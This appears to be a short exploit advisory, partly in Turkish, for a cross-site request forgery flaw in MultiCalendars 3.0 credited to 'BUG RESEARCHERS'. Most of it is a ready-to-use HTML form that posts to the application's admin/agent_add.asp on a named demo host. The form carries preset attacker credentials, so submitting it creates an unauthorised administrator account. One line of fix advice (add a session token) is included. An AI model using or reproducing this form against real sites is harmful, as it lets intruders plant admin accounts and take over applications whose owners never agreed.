< ------------------- header data start ------------------- >

#############################################################

# Application Name :MultiCalendars 3.0

# vulnerable Type : xsrf

# Infection : Yeni Bir Admin Eklenebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<form action=http://www.europeum.net/Demos/MC3/admin/agent_add.asp method=post name=frm onSubmit=return validateAgentAdd()>
<input style=width: 300px; class=textbox type=Text name=name size=35 maxlength=65 value=cwhirlpool bug res>
<input style=width: 300px; class=textbox type=Text name=username size=35 maxlength=25 value=cwhirlpool>
<input style=width: 300px; class=textbox type=password name=password size=35 maxlength=25 value=bugresearchers>
<input style=width: 300px; class=textbox type=Text name=email size=35 maxlength=80 value=>
<input checked type=Checkbox name=active value=1>
<input type=Submit value=Add Agent>
<input type=Hidden name=mode value=add>
</form>
< -- bug code end of -- >